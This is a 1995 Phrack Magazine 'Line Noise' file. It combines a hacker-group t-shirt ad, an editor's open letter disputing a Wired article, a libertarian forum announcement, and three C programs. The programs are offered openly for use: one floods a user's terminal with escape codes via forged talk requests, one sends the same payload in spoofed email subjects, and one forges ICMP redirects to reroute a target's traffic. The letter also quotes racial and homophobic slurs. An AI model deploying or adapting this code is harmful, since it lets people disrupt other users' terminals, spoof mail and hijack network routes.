[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Line Noise ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ]
Current issue : #47 | Release date : 1995-04-15 | Editor : Erik Bloodaxe
IntroductionErik Bloodaxe
Phrack LoopbackPhrack Staff
Line NoisePhrack Staff
Line NoisePhrack Staff
The #hack FAQ (Part 1)voyager
The #hack FAQ (Part 2)voyager
The #hack FAQ (Part 3)voyager
The #hack FAQ (Part 4)voyager
DEFCon InformationPhrack Staff
HoHoConNetta Gilboa
HoHoConCount Zero
HoHo Miscellanyvarious
An Overview of Prepaid Calling CardsTreason
The Glenayre GL3000 Paging and Voice Retrieval SystemArmitage
Complete Guide to Hacking Meridian Voice MailSubstance
DBS Primer from American Hacker Magazineunknown
Your New Windows Background (Part 1)The Man
Your New Windows Background (Part 2)Substance
A Guide To British Telecom's Caller ID ServiceDr. B0B
A Day in The Life of a Warez BrokerXxxx Xxxxxxxx
International Scenesvarious
Phrack World NewsDatastream Cowboy
Title : Line Noise
Author : Phrack Staff
                         ==Phrack Magazine==

              Volume Six, Issue Forty-Seven, File 4 of 22


                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                                 PART II

------------------------------------------------------------------------------

The official Legion of Doom t-shirts are stll available!!!
Join the net luminaries world-wide in owning one of these amazing
shirts.  Impress members of the opposite sex, increase your IQ,
annoy system administrators, get raided by the government and
lose your wardrobe!
 
Can a t-shirt really do all this?  Of course it can!
 
--------------------------------------------------------------------------
 
"THE HACKER WAR  --  LOD vs MOD"
 
This t-shirt chronicles the infamous "Hacker War" between rival
groups The Legion of Doom and  The Masters of Destruction.  The front
of the shirt displays a flight map of the various battle-sites
hit by MOD and tracked by LOD.  The back of the shirt
has a detailed timeline of the key dates in the conflict, and
a rather ironic quote from an MOD member.
 
(For a limited time, the original is back!)
 
"LEGION OF DOOM  --  INTERNET WORLD TOUR"
 
The front of this classic shirt displays "Legion of Doom Internet World
Tour" as well as a sword and telephone intersecting the planet
earth, skull-and-crossbones style.  The back displays the
words "Hacking for Jesus" as well as a substantial list of "tour-stops"
(internet sites) and a quote from Aleister Crowley.
 
--------------------------------------------------------------------------
 
All t-shirts are sized XL, and are 100% cotton.
 
Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for
postage.
 
Send checks or money orders.  Please, no credit cards, even if
it's really your card.
 
 
Name:       __________________________________________________
 
Address:    __________________________________________________
 
City, State, Zip:   __________________________________________
 
 
I want ____ "Hacker War" shirt(s)
 
I want ____ "Internet World Tour" shirt(s)
 
Enclosed is $______ for the total cost.
 
 
Mail to:   Chris Goggans
           603 W. 13th #1A-278
           Austin, TX 78701
 
 
These T-shirts are sold only as a novelty items, and are in no way
attempting to glorify computer crime.

------------------------------------------------------------------------------

[The editor's Open Letter to Wired Magazine...they actually had the nerve
 to print it in their May issue.  Amazing...or was it?  The letter was posted
 to 10 USENET newsgroups, put on the Wired forums on AOL, Mindvox and the Well,
 sent in email to every user of wired.com, faxed to all 7 fax machines at
 Wired and sent to them registered mail.  Probably more than 5 times
 Wired's paid circulation saw it, so they HAD to print it or look foolish.
 At least, that's my take on it.  Just for overkill, here it is again.]

To Whom It May Concern:

I am writing this under the assumption that the editorial staff at
Wired will "forget" to print it in the upcoming issue, so I am
also posting it on every relevant newsgroup and online discussion forum
that I can think of.

When I first read your piece "Gang War In Cyberspace" I nearly choked on
my own stomach bile.  The whole tone of this piece was so far removed from
reality that I found myself questioning what color the sky must be
in Wired's universe.  Not that I've come to expect any better from Wired.
Your magazine, which could have had the potential to actually do something,
has become a parody...a politically correct art-school project that
consistently falls short of telling the whole story or making a solid point.
(Just another example of Kapor-Kash that ends up letting everyone down.)

I did however expect more from Josh Quittner.

I find it interesting that so much emphasis can be placed on an issue of
supposed racial slurs as the focus of an imaginary "gang war," especially
so many years after the fact.

It's also interesting to me that people keep overlooking the fact that one of
the first few members of our own little Legion of Doom was black (Paul
Muad'dib.)  Maybe if he had not died a few years back that wouldn't be
so quickly forgotten.  (Not that it makes a BIT of difference what color
a hacker is as long as he or she has a brain and a modem, or these days
at least a modem.)

I also find it interesting that a magazine can so easily implicate someone
as the originator of the so-called "fighting words" that allegedly sparked
this online-battle, without even giving a second thought as to the damage
that this may do to the person so named.  One would think that a magazine
would have more journalistic integrity than that (but then again, this IS
Wired, and political correctness sells magazines and satisfies advertisers.)
Thankfully, I'll only have to endure one month of the "Gee Chris, did you
know you were a racist redneck?" phone calls.

It's further odd that someone characterized as so sensitive to insults
allegedly uttered on a party-line could have kept the company he did.
Strangely enough, Quittner left out all mention of the MOD member who called
himself "SuperNigger."  Surely, John Lee must have taken umbrage to an
upper-middle class man of Hebrew descent so shamefully mocking him and
his entire race, wouldn't he?   Certainly he wouldn't associate in any way
with someone like that...especially be in the same group with, hang out with,
and work on hacking projects with, would he?

Please, of course he would, and he did.  (And perhaps he still does...)

The whole "racial issue" was a NON-ISSUE.  However, such things make
exciting copy and garner many column inches so keep being rehashed.  In
fact, several years back when the issue first came up, the statement was
cited as being either "Hang up, you nigger," or "Hey, SuperNigger," but
no one was sure which was actually said.  Funny how the wording changes
to fit the slant of the "journalist" over time, isn't it?

I wish I could say for certain which was actually spoken, but alas, I was not
privy to such things.  Despite the hobby I supposedly so enjoyed according
to Quittner, "doing conference bridges," I abhorred the things.  We used to
refer to them as "Multi-Loser Youps" (multi-user loops) and called their
denizens "Bridge Bunnies."  The bridge referred to in the story was
popularized by the callers of the 5A BBS in Houston, Texas.  (A bulletin board,
that I never even got the chance to call, as I had recently been raided by
the Secret Service and had no computer.)  Many people from Texas did call
the BBS, however, and subsequently used the bridge, but so did people from
Florida, Arizona, Michigan, New York and Louisiana.  And as numbers do in the
underground, word of a new place to hang out caused it to propagate rapidly.

To make any implications that such things were strictly a New York versus Texas
issue is ludicrous, and again simply goes to show that a "journalist" was
looking for more points to add to his (or her) particular angle.

This is not to say that I did not have problems with any of the people
who were in MOD.  At the time I still harbored strong feelings towards
Phiber Optik for the NYNEX-Infopath swindle, but that was about it.
And that was YEARS ago.  (Even I don't harbor a grudge that long.)
Even the dozen or so annoying phone calls I received in late 1990 and
early 1991 did little to evoke "a declaration of war."  Like many people,
I know how to forward my calls, or unplug the phone.  Amazing how technology
works, isn't it?

Those prank calls also had about as much to do with the formation of Comsec as
bubble-gum had to do with the discovery of nuclear fission.  (I'm sure if you
really put some brain power to it, and consulted Robert Anton Wilson,
you could find some relationships.)  At the risk of sounding glib, we
could have cared less about hackers at Comsec.  If there were no hackers,
or computer criminals, there would be no need for computer security
consultants.  Besides, hackers account for so little in the real picture
of computer crime, that their existence is more annoyance than something
to actually fear.

However, when those same hackers crossed the line and began tapping our
phone lines, we were more than glad to go after them.  This is one of my only
rules of action:  do whatever you want to anyone else, but mess with me and
my livelihood and I will devote every ounce of my being to paying you back.
That is exactly what we did.

This is not to say that we were the only people from the computer underground
who went to various law enforcement agencies with information about
MOD and their antics.  In fact, the number of hackers who did was staggering,
especially when you consider the usual anarchy of the underground.  None of
these other people ever get mentioned and those of us at Comsec always take
the lead role as the "narks," but we were far from alone.  MOD managed to
alienate the vast majority of the computer underground, and people reacted.

All in all, both in this piece, and in the book itself, "MOD, The Gang That
Ruled Cyberspace," Quittner has managed to paint a far too apologetic piece
about a group of people who cared so very little about the networks they
played in and the people who live there.  In the last 15 years that I've
been skulking around online, people in the community have always tended
to treat each other and the computers systems they voyeured with a great deal
of care and respect.  MOD was one of the first true examples of a groupthink
exercise in hacker sociopathy.  Selling long distance codes, selling credit
card numbers, destroying systems and harassing innocent people is not
acceptable behavior among ANY group, even the computer underground.

There have always been ego flares and group rivalries in the underground, and
there always will be.  The Legion of Doom itself was FOUNDED because of a
spat between its founder (Lex Luthor) and members of a group called The Knights
of Shadow.  These rivalries keep things interesting, and keep the community
moving forward, always seeking the newest bit of information in a series
of healthy one-upsmanship.  MOD was different.  They took things too far
against everyone, not just against two people in Texas.

I certainly don't condemn everyone in the group.  I don't even know
a number of them (electronically or otherwise.)  I honestly believe
that Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed while
the group's two biggest criminals, Julio Fernandez (Outlaw) and Allen Wilson
(Wing), rolled over on everyone else and walked away free and clear.  This is
repulsive when you find out that Wing in particular has gone on to be
implicated in more damage to the Internet (as Posse and ILF) than anyone in
the history of the computing.  This I find truly disgusting, and hope that
the Secret Service are proud of themselves.

Imagine if I wrote a piece about the terrible treatment of a poor prisoner
in Wisconsin who was bludgeoned to death by other inmates while guards
looked away.  Imagine if I tried to explain the fact that poor Jeff Dahmer was
provoked to murder and cannibalism by the mocking of adolescent boys who teased
and called him a faggot.  How would you feel if I tried to convince you that we
should look upon him with pity and think of him as a misunderstood political
prisoner?  You would probably feel about how I do about Quittner's story.

'Hacker' can just as easily be applied to "journalists" too, and with this
piece Quittner has joined the Hack Journalist Hall of Fame, taking his
place right next to Richard Sandza.

Quittner did get a few things right.  I do have a big cat named Spud, I do
work at a computer company and I do sell fantastic t-shirts.  Buy some.

With Love,

Chris Goggans
aka Erik Bloodaxe

phrack@well.com

------------------------------------------------------------------------------

From: DigitaLiberty@phantom.com

Subject: Announcing - The DigitaLiberty Forum

PLEASE RE-DISTRIBUTE THIS AS YOU SEE FIT

Friends of Liberty,

It is becoming increasingly apparent that the arrival of cyberspace is
destined to engender a fundamental discontinuity in the course of human
relations.  This is a source of great optimism and opportunity for those of
us who believe in freedom.

Many of you who participate in the lively debates that take place in these
forums have seen a number of activist organizations spring up claiming  to
represent the cause of freedom.  And if you are like me you have cheered
these groups on only to watch them get bogged down in a quagmire of
realpolitics.  

It is a sad fact that the beast in Washington has evolved into a
self-perpetuating engine expert at co-opting the principles of even the most
ardent reformers.  Slowly but surely all those who engage the system are
ultimately absorbed into the mainstream miasma of majoritarianism.  For
example, what can be more discouraging than watching an organization that
started out as a civil liberties group shift its focus to creating new forms
of government entitlements while endorsing intrusive wiretap legislation
because they didn't want to jeopardize their influence and prestige amongst
the Washington power elite?

Some of us believe we can seek ultimate redress at the polls.  Many pundits
have declared our recent national elections a watershed in politics, a
turning point that represents the high water mark of big government.
 Nonsense.  The names have changed, the chairs have been rearranged, but the
game remains the same.  The so-called "choices" we are presented with are
false, hardly better than the mock one-party elections held by failed
totalitarian regimes.  There must be a better way.

I would like to announce the formation of a new group - DigitaLiberty - that
has chosen a different path.  We intend to bypass the existing political
process.  We reject consensus building based on the calculus of compromise.
 Instead we plan to leave the past behind, much as our pioneering forefathers
did when they set out to settle new lands.  It is our mission to create the
basis for a different kind of society.  If you would like to join us I invite
you to read the information below.

Yours in freedom,



Bill Frezza
Co-founder, DigitaLiberty
December 1994



***  What is DigitaLiberty?

DigitaLiberty is an advocacy group dedicated to the principled defense of
freedom in cyberspace.  We intend to conduct this defense not by engaging in
traditional power politics but by setting an active, persuasive example -
creating tangible opportunities for others to join us as we construct new
global communities.  

We believe deeply in free markets and free minds and are convinced that we
can construct a domain in which the uncoerced choices of individuals supplant
the social compact politics of the tyranny of the majority. 

***  Is DigitaLiberty a political party or a lobbying group?

Neither.  

DigitaLiberty does not seek to educate or influence politicians in the hope
of obtaining legislation favorable to our constituents.  We plan to make
politicians and legislators irrelevant to the future of network based
commerce, education, leisure, and social intercourse.

DigitaLiberty does not seek to persuade a majority of the electorate to adopt
views which can then be forced upon the minority.  We hope to make
majoritarianism irrelevant.  We invite only like minded individuals to help
us build the future according to our uncompromised shared values.  


*** What do you hope to accomplish?

DigitaLiberty is not hopeful that widespread freedom will come to the
physical world, at least not in our lifetime.  Too many constituencies depend
upon the largess and redistributive power of national governments and
therefore oppose freedom and the individual responsibility it entails.  But
we do believe that liberty can and will prevail in the virtual domains we are
building on the net and that national governments will be powerless to stop
us.  We believe that cyberspace will transcend national borders, national
cultures, and national economies.  We believe that no one will hold
sovereignty over this new realm because coercive force is impotent in
cyberspace.

In keeping with the self-organizing nature of on-line societies we believe we
will chose to invent new institutions to serve our varied economic and social
purposes.  DigitaLiberty intends to be in the forefront of the discovery and
construction of these institutions.  

***  But what about the construction of the "Information Superhighway"?

The fabric of cyberspace is rapidly being built by all manner of entities
espousing the full range of political and economic philosophies.   While
political activity can certainly accelerate or retard the growth of the net
in various places and times it cannot stop it nor can it effectively control
how the net will be used.  

Our focus is not on the institutions that can and will impact the building of
the physical "information highway" but on those that will shape life on the
net as an ever increasing portion of our productive activities move there.

***  What makes you think cyberspace will be so different?

The United States of America was the only country in history ever to be built
upon an idea.  Unfortunately, this idea was lost as we slowly traded away our
liberties in exchange for the false promise of security.

DigitaLiberty believes that technology can set us free.  The economies of the
developed world are now making a major transition from an industrial base to
an information base.  As they do, the science of cryptology will finally and
forever guarantee the unbreachable right of privacy, protecting individuals,
groups, and corporations from the prying eyes and grasping hands of
sovereigns.  We will all be free to conduct our lives, and most importantly
our economic relations, as we each see fit.  

Cyberspace is also infinitely extensible.   There will be no brutal
competition for lebensraum.  Multiple virtual communities can exist side by
side and without destructive conflict, each organized according to the
principles of their members.  We seek only to build one such community, a
community based on individual liberty.  Others are free to build communities
based on other principles, even diametrically opposed principles.  But they
must do so without our coerced assistance.

Effective communities will thrive and grow.  Dysfunctional communities will
wither and die.  And for the first time in human history, rapacious societies
will no longer have the power to make war on their neighbors nor can bankrupt
communities take their neighbors down with them.  

***  What does this have to do with my real life?  I can't eat data.  I don't
live in a computer.

Yes, but imagine the ultimate impact of mankind's transition from an agrarian
economy to an industrial economy to an information economy.  Our founding
fathers would have consider anyone insane who predicted that a nation of 250
million could feed itself with fewer than 3% of its citizens involved in
agriculture.  Similarly, economists and politicians trapped in the policies
of the past lament our move from a manufacturing economy to a knowledge
worker and service based economy.  We see this as a cause to rejoice.

The day will come when fewer than 5% of the citizens of a nation of 1 billion
will be involved in manufacturing - if we still bother calling geographically
defined entities "nations".  What will the rest of us be doing?  We will be
providing each other with an exploding array of services and we will be
creating, consuming, and exchanging information.  Most of this will occur
entirely within or be mediated at least in part by our activities in
cyberspace.  

Many of us will earn a very good living on the net.  Our race, our religion,
our gender, our age, our physical appearance and limitations will all be
irrelevant and undetectable.  Hard working individuals from underdeveloped
nations who in the past might have been forced to emigrate in search of
economic freedom and opportunity can now build productive lives in
cyberspace.  And much if not all of the wealth we create that we do not
transform into visible physical assets will be ours to keep and use, beyond
the grasp of sovereigns.  

*** What is the purpose of this forum?

The DigitaLiberty Forum is a place where like minded individuals can share
their views, observations, and strategies related to the development of
virtual communities based on freedom.  It is a place where people can
exchange information and advice about how they have developed
extra-territorial business and social relationships  - away from the
influence and outside the jurisdiction of governments.  It is a forum for the
posting of essays, questions, and ideas on the topic of liberty.  It is a
place where we can meet and debate the forms that our  new institutions might
take and discuss the practical problems and responsibilities that freedom
entail.

In time as our technology matures some of us will move on to more ambitious
projects, launch other programs, and begin our virtual migration from the
swamp of coerced collectivism.  Best of all, there will be no need to
physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'.  We
can all participate in this exodus without hastily quitting our jobs or
disrupting our lives.  And as a larger and larger portion of our economic and
social activities move onto the net we will create a new society, open to all
with the will to enter.  This new world will be interleaved with the physical
world in which we now live and yet will be separate.  And free.

Join us as we begin the journey.

*** Who can join DigitaLiberty?

The DigitaLiberty Forum is open to anyone that can honestly answer yes to the
following two questions:

1)  I renounce the use of coercive force as a tool of social or economic
policy.

2)  I do not derive the majority of my income from funds taken from
taxpayers.

*** How do I join DigitaLiberty?

If you qualify, send a message to DigitaLiberty-request@phantom.com with the
words "SUBSCRIBE" in the subject line and the message body as follows

SUBSCRIBE DigitaLiberty <your name>

And welcome to the future.

###

------------------------------------------------------------------------------
/* flash3.c */

/* 
   Modified from the original by Vassago. Superflash mods unknown.
   Try the PhoEniX FTP Site: wentz21.reslife.okstate.edu in /pub.
*/

/* 
    This little program is intended to quickly mess up a user's
    terminal by issuing a talk request to that person and sending
    vt100 escape characters that force the user to logout or kill
    his/her xterm in order to regain a sane view of the text.
    It the user's message mode is set to off (mesg n) he/she will
    be unharmed. 

    Try compiling with: gcc -o flash flash3.c

    Usage: flash user@host [<level>]
   
    Level is either the number or the word for these:
	  1)  BASIC  - Old flash, no zmodem. 
	  2)  ZMODEM - Old with ZModem.
	  3)  KILLER - 99 ZModem flashes. 
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <ctype.h>

#define BASIC  1
#define ZMODEM 2
#define KILLER 3

#define FIRST "\033(0\033#8" 
#define SECOND "\033[1;3r"
#define THIRD  "\033[1;5m\033(0"
#define FOURTH "**\030B00"
#define FIFTH  "\033**EMSI_IRQ8E08"

/* Comment this to remove the debugging message... */
#define INFOMESSAGE

/* this should really be in an include file..  */

#define OLD_NAME_SIZE 9
#define NAME_SIZE    12
#define TTY_SIZE     16 
typedef struct {
	char    type;
	char    l_name[OLD_NAME_SIZE];
	char    r_name[OLD_NAME_SIZE];
	char    filler;
	u_long  id_num;
	u_long  pid;
	char    r_tty[TTY_SIZE];
	struct  sockaddr_in addr;
	struct  sockaddr_in ctl_addr;
} OLD_MSG;

typedef struct {
	u_char  vers;
	char    type;
	u_short filler;
	u_long  id_num;
	struct  sockaddr_in addr;
	struct  sockaddr_in ctl_addr;
	long    pid;
	char    l_name[NAME_SIZE];
	char    r_name[NAME_SIZE];
	char    r_tty[TTY_SIZE];
} CTL_MSG;

int seed = 0x2837;

#define TALK_VERSION    1               /* protocol version */

/* Types */
#define LEAVE_INVITE    0
#define LOOK_UP         1
#define DELETE          2
#define ANNOUNCE        3

int     current = 1;    /* current id..  this to avoid duplications */

struct sockaddr_in *getinaddr(char *hostname, u_short port)
{
static  struct sockaddr    addr;
struct  sockaddr_in *address;
struct  hostent     *host;

address = (struct sockaddr_in *)&addr;
(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
/* fill in the easy fields */
address->sin_family = AF_INET;
address->sin_port = htons(port);
/* first, check if the address is an ip address */
address->sin_addr.s_addr = inet_addr(hostname);
if ( (int)address->sin_addr.s_addr == -1)
	{
	/* it wasn't.. so we try it as a long host name */
	host = gethostbyname(hostname);
	if (host)
		{
		/* wow.  It's a host name.. set the fields */
		/* ?? address->sin_family = host->h_addrtype; */
		bcopy( host->h_addr, (char *)&address->sin_addr,
			host->h_length);
		}
	else
		{
		/* oops.. can't find it.. */
		puts("Flash aborted, could not find address."); 
		exit(-1);
		return (struct sockaddr_in *)0;
		}
	}
/* all done. */
return (struct sockaddr_in *)address;
}

SendTalkPacket(struct sockaddr_in *target, char *p, int psize) 
{
int     s;
struct sockaddr sample; /* not used.. only to get the size */

s = socket(AF_INET, SOCK_DGRAM, 0);
sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); 
} 


new_ANNOUNCE(char *hostname, char *remote, char *local)
{
CTL_MSG  packet; 
struct   sockaddr_in  *address;

/* create a packet */
address = getinaddr(hostname, 666 );  
address->sin_family = htons(AF_INET); 

bzero( (char *)&packet, sizeof(packet) );
packet.vers   = TALK_VERSION; 
packet.type   = ANNOUNCE;   
packet.pid    = getpid();
packet.id_num = current;
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); 
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
strncpy( packet.l_name, local, NAME_SIZE); 
strncpy( packet.r_name, remote, NAME_SIZE); 
strncpy( packet.r_tty, "", 1); 

SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); 
}

old_ANNOUNCE(char *hostname, char *remote, char *local)
{
OLD_MSG  packet;
struct   sockaddr_in  *address;

/* create a packet */
address = getinaddr(hostname, 666 );
address->sin_family = htons(AF_INET);

bzero( (char *)&packet, sizeof(packet) );
packet.type   = ANNOUNCE;
packet.pid    = getpid();
packet.id_num = current;
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
strncpy( packet.l_name, local, NAME_SIZE);
strncpy( packet.r_name, remote, NAME_SIZE);
strncpy( packet.r_tty, "", 1);

SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
}

int rnd()
{
  seed *=0x1243;
  seed = seed & 0xFFFF;
  seed +=1;
  while(seed>10000)seed-=10000;
  return(seed);
}


pop(char *hostname, char *username, char *flashstring)
{
  char newflashstr[80];
  int e = rnd();
  sprintf(newflashstr,"%d%s",e,flashstring); 
  new_ANNOUNCE(hostname, username, newflashstr); 
  old_ANNOUNCE(hostname, username, newflashstr);
}    

flash(int type, char *hostname, char *username)
{
	 char firestring[10];
	 int x,y;

	 current=0;
	 if (type == 3) y = 14;
	 else y = 1;

	 for(x=0;x<y;x++)    
	 {
	current++;
	pop(hostname, username, FIRST);
	current++; 
	pop(hostname, username, SECOND);
	current++;
	pop(hostname, username, THIRD); 
	if(type>1)
	{
	  current++;
	  pop(hostname, username, FOURTH); 
	  current++;
	  pop(hostname, username, FIFTH); 
	  current++;
	  pop(hostname, username, FOURTH);
	}
	current++;
	pop(hostname, username, FIRST); 
	 }
    return(current);
}

GetType(char *TypeStr)
{
	if (strcmp(TypeStr,"basic")==0)
		return(1);
	else if (strcmp(TypeStr,"zmodem")==0)
		return(2);
	else if (strcmp(TypeStr,"killer")==0)
		return(3);
	else if (strcmp(TypeStr,"1")==0)
		return(1);
	else if (strcmp(TypeStr,"2")==0)
		return(2);
	else if (strcmp(TypeStr,"3")==0)
		return(3);
}    

main(int argc, char *argv[])
{
	char    *hostname, *username; 
	int     pid,type,name;


	if ( (pid = fork()) == -1)  
		{
		perror("fork()");
		exit(-1);
		}
	if ( !pid )
		{
		exit(0);
		}
	if (argc < 2) { 
		puts("USAGE: flash user@host [<flash type>]");
		puts("Types are: 1) basic, 2) zmodem, 3) killer.");
		puts("Default flash type is zmodem.");
		exit(5);
	}
	if (argc >= 3) {
		type=GetType(argv[argc-1]);
		if(type<1||type>3)type=ZMODEM;
	}
	else type=ZMODEM;   /* default */

	for(name=1; name<argc-1; name++)
	{
	username = argv[name]; 
	if ( (hostname = (char *)strchr(username, '@')) == NULL )       
		{
		puts("Aborted, invalid name.  ");
		exit(-1);
		}
	*hostname = '\0'; 
	hostname++; 

	if (*username == '~') 
		username++; 
#ifdef INFOMESSAGE
			printf("Sending a type #%d flash to %s@%s. (%d messages)\n",
			type,username,hostname,
			flash(type,hostname,username));
#else
	flash(type,hostname,username);
#endif
	sleep(1);
	}
}


------------------------------------------------------------------------------

/*

  Mail Flash - (C) 1994 CHA0S All Rights Reserved
  
  This is a simple program which demonstrates the problem with certain
  parts of VT100 emulation.  Previously similar programs made use
  of talkd, but a user could stop attempts by simply entering
  "mesg n".  This program sends the "flash" string which will really
  screw over a terminal in the SUBJECT header of e-mail.  E-Mail readers
  such as pine show you this before you can decide to even delete the mail!
  
  Support has been added to choose your own SMTP server for neat-o hostname
  spoofing.  (krad!)
  
*/  

#include <stdio.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
 
void smtp_connect(char *server);
 
int thesock; /* the socket */
 
void smtp_connect(char *server)
{
  struct sockaddr_in sin;
  struct hostent *hp;
  
  hp = gethostbyname(server);
  if (hp==NULL) {
    printf("Unknown host: %s\n",server);
    exit(0);
  }
  bzero((char*) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  thesock = socket(AF_INET, SOCK_STREAM, 0);
  connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
}
 
void main(int argc, char **argv)
{
  char buf[1024];
  
  if (argc != 4) {
    printf("usage: mflash smtp_server from to\n");
    exit(0);
  }
  printf("Connecting to SMTP Server %s\n",argv[1]);
  smtp_connect(argv[1]);
  printf("Sending Mail Flash To %s\n",argv[3]);
  sprintf(buf, "helo a\nmail from: %s\nrcpt to: %s\ndata\nSUBJECT: \033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h\n.\nquit\n",argv[2],argv[3]);
  send(thesock, buf, strlen(buf), 0);
  /* I am not sure how to check when this buffer is done being sent.
     If you are having any problems increase the sleep time below! */
  printf("Sleeping To Make Sure Data Is Sent ...\n");
  sleep(3);
  printf("Done!\n");
}

------------------------------------------------------------------------------

[Editor's Note:  Does this work?  I don't think so, but a clever hacker might
 use the code to do something "interesting."  The concept is sound...the
 delivery needs a bit of tweaking.]

#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/tcp.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

int 
resolver(host,saddr)
  char *host;
  struct sockaddr_in *saddr;
{
  struct hostent *h=gethostbyname(host);

  bzero(saddr,sizeof(struct sockaddr));
  saddr->sin_family=AF_INET;
  if (h!=NULL)
  {
    saddr->sin_family=h->h_addrtype;
    bcopy(h->h_addr,(caddr_t)&saddr->sin_addr,h->h_length);
    return(0);
  }
  else
  {
    fprintf(stderr,"juju-router: unknown host ``%s''\n",host);
    return(-1);
  }
  return(0);
}

in_cksum(addr,len)
  u_short *addr;
  int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  /* This function was taking from existing ICMP nuke code and
     was presumably originally stripped from a ``ping.c'' implementation.
  */

  while( nleft > 1 )
  {
    sum+=*w++;
    nleft-=2l;
  }
  if( nleft == 1 )
  {
    *(u_char *)(&answer) = *(u_char *)w;
    sum+=answer;
  }
  sum=(sum>>16)+(sum& 0xffff);
  sum+=(sum>>16);
  answer=~sum;
  return(answer);
}

int
icmp_reroute(host,uhost,port,code)
  char *host, *uhost;
  int code, port;
{
  struct sockaddr_in       name;
  struct sockaddr          dest,    uspoof;
  struct icmp              *mp;
  struct tcphdr            *tp;
  struct protoent          *proto;

  int    i, s, rc;
  char   *buf=(char *) malloc(sizeof(struct icmp)+64);

  mp=(struct icmp *) buf;

  if (resolver(host,&dest)<0) return(-1);
  if (resolver(uhost,&uspoof)<0) return(-1);

  if ((proto=getprotobyname("icmp")==NULL))
  {
    fprintf(stderr,"fatal; unable to determine protocol number of ``icmp''\n");
    return(-1);
  }
  
  if ((s=socket(AF_INET,SOCK_RAW,proto->p_proto))<0) 
  {
    perror("opening raw socket");
    return(-1);
  }
  name.sin_family=AF_INET;
  name.sin_addr.s_addr=INADDR_ANY;
  name.sin_port=htons(port);

  if ((rc=bind(s,(struct sockaddr *) &name, sizeof(name)))==-1)
  {
    fprintf(stderr,"fatal; error binding sockets\n");
    return(-1);
  }

  if ((proto=getprotobyname("tcp")==NULL))
  {
    fprintf(stderr,"fatal; unable to determine protocol number of ``tcp''\n");
    return(-1);
  }

  bzero(mp,sizeof(struct icmp)+64);
  mp->icmp_type         = ICMP_REDIRECT;
  mp->icmp_code         = code;
  mp->icmp_ip.ip_v      = IPVERSION;
  mp->icmp_ip.ip_hl     = 5;
  mp->icmp_ip.ip_len    = htons(sizeof(struct ip)+64+20);
  mp->icmp_ip.ip_p      = IPPROTO_TCP;
  mp->icmp_ip.ip_src    = ((struct sockaddr_in *)&dest)->sin_addr;
  mp->icmp_ip.ip_dst    = ((struct sockaddr_in *)&dest)->sin_addr;
  mp->icmp_gwaddr       = ((struct sockaddr_in *)&uspoof)->sin_addr;
  mp->icmp_ip.ip_ttl    = 150;
  mp->icmp_cksum        = 0;
  tp=(struct tcphdr *)((char *)&mp->icmp_ip+sizeof(struct ip));
  tp->th_sport          = 23;
  tp->th_dport          = htons(1499);
  tp->th_seq            = htonl(0x275624F2);
  mp->icmp_cksum        = htons(in_cksum(mp,sizeof(struct icmp)+64));

  if ((i=sendto(s,buf,sizeof(struct icmp)+64,0,&dest,sizeof(dest)))<0)
  {
    fprintf(stderr,"fatal; error sending forged packet\n");
    return(-1);
  }
  return(0);
}

void
main(argc,argv)
  int argc;
  char **argv;
{
  int i, code;

  if ((argc<4) || (argc>5))
  {
    fprintf(stderr,"usage: juju-router target new-destination port code\n");
    fprintf(stderr,"codes: 0 _REDIRECT_NET    1 _REDIRECT_HOST (default)\n");
    fprintf(stderr,"       2 _REDIRECT_TOSNET 2 _REDIRECT_TOSHOST\n");  
    exit(1);
  }

  printf("juju-router: rerouting dynamically....");
  if (code!=0 && code!=1 && code!=2 && code!=3) code=0;
  if (icmp_reroute(argv[1],argv[2],argv[3],code)<0)
  {
    printf("failed.\n");
    exit(1);
  }
  printf("succeeded.\n");
  exit(0);
}

